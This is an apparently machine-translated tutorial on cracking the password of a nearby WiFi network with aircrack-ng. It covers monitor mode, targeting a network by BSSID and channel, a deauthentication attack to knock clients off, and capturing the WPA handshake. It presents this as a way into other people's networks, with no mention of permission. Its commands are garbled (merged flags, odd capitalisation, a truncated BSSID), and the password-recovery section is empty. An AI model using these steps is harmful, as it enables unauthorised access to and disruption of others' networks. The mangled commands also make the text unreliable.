Get the password for nearby WiFi using the Aircrack-ng tool

Tip: All of the following commands are executed as root user

One, shutting down the network and ending processes that may affect the results
1. Close the network

Service Network-manager Stop

2. End processes that may affect results

Airmon-ng Check Kill

Second, turn on the wireless card to monitor mode 1, check the list of network cards

Iwconfig

Note: With Wlan0 and Wlan1 is the wireless card, my computer has two wireless network cards

2, start the network card to the listening mode (use wlan0 here)

Airmon-ng Start Wlan0

Note: If the boot is successful, a new name Interface name is given after startup, Mon0

Third, listen to the surrounding wireless network connection and get handshake information 1, listen to all surrounding wireless network information

Airodump-ng Mon0

In this command, Mon0 is the interface name we got in the previous step.

Description: The bottom half of the graph, the column bssid to have a non-associated line, the last line is:

c0:xx:xx:xx:xx:00    14:xx:xx:xx:xx:b4    -87         0-1        3        2

At this point, write down the c0:xx:xx:xx:xx:00 and find the corresponding c0:xx:xx:xx:xx:00 line in the upper part of the graph, and note that the value under CH column is 1. Then close this window.

2, listening to the wireless network of interest

Based on the results from the previous step, execute the following command:

Airodump-ng--bssid c0:xx:xx:xx:xx-c 1-w tmp mon0

In this command--bssid followed by our last Bssid value, namely: c0:xx:xx:xx:xx:00. The-C followed by the value 1 that I found in the previous step in the CH column. And-W followed by the file name we saved the network data, here is the TMP. At the end of the command is the mon0 that was received before

Results are obtained after running the command and ensure that the bottom half of the BSSID has at least one row of data

3. Get Handshake Package

Keep the window in the previous step closed, open a new window, execute the following command:

aireplay-ng-0 2-a c0:xx:xx:xx:xx:00-c 14:xx:xx:xx:xx:b4 mon0

The parameter-A in this command is followed by the value c0:xx:xx:xx:xx:00 of the first row under the Bssid column of the lower-middle section. The parameter-C is followed by the value 14:xx:xx:xx:xx:b4 of the first row below the station column in the lower-middle part. Mon is the value obtained from the previous step. After execution:

Observe whether the contents of the Red section appear in the window that we did not close in step 2. If it doesn't appear, wait a few more minutes to execute the command in this step again until it appears. If you have performed more than 30 times or if the time is longer than 30 minutes, it is recommended that you change to an interesting network.

The content in the red box shows that we have obtained the Handshake information (which contains the data of the network password). Then we can end the listening network.

Four, stop monitoring 1, shut down the monitoring interface

Airmon-ng Stop Mon0

2. Start the network

Service Network-manager Start

Five, get the password

Vi. possible problems 1, receive on CHANNEL-1 error

Step 3.3 Execution

aireplay-ng-0 2-a c0:xx:xx:xx:xx:00-c 14:xx:xx:xx:xx:b4 mon0

Prompt error:

11:41:04  waiting for beacons frame (BSSID:  XX:XX:XX:XX:XX:XX) on channel-111:41:04  couldn ' t determine Current channel for Mon0, should either force the operation with--ignore-negative-one or apply a kernel patchplease s Pecify an ESSID (-e).

Workaround:

(1) Ensure that the window in step 3.1 is closed.

(2) Ensure the execution of the command in the 3.2 steps, and the name of the parameter-C and the value of the parameter-C is correct (parameter-C 1 is to lock the Mon0 channel on Channel 1)

Get the password for nearby WiFi using the Aircrack-ng tool